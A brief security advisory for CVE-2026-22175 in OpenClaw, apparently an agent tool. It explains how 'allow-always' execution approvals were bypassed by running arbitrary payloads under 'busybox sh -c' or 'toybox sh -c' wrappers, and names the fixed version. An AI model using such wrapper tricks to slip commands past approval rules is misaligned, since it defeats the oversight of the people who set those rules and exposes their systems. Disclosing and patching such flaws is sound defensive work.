CVE-2026-22175

Name of the Vulnerable Software and Affected Versions OpenClaw versions prior to 2026.2.23

Description OpenClaw contains a flaw in allowlist mode where 'allow-always' grants can be bypassed through unrecognized multiplexer shell wrappers, such as busybox sh -c and toybox sh -c commands. This allows attackers to invoke arbitrary payloads under the same multiplexer wrapper, satisfying stored allowlist rules and circumventing intended execution restrictions. The issue arises because wrapper analysis incorrectly treated invocations of busybox and toybox as non-wrapper commands, persisting the wrapper binary path instead of the inner executable. This allowed subsequent arbitrary payloads to satisfy the stored allowlist rule. The fix improves wrapper detection and persistence behavior, ensuring approvals bind to the intended inner executables and fail closed when unwrap safety is uncertain.

Recommendations Update OpenClaw to version 2026.2.23 or later.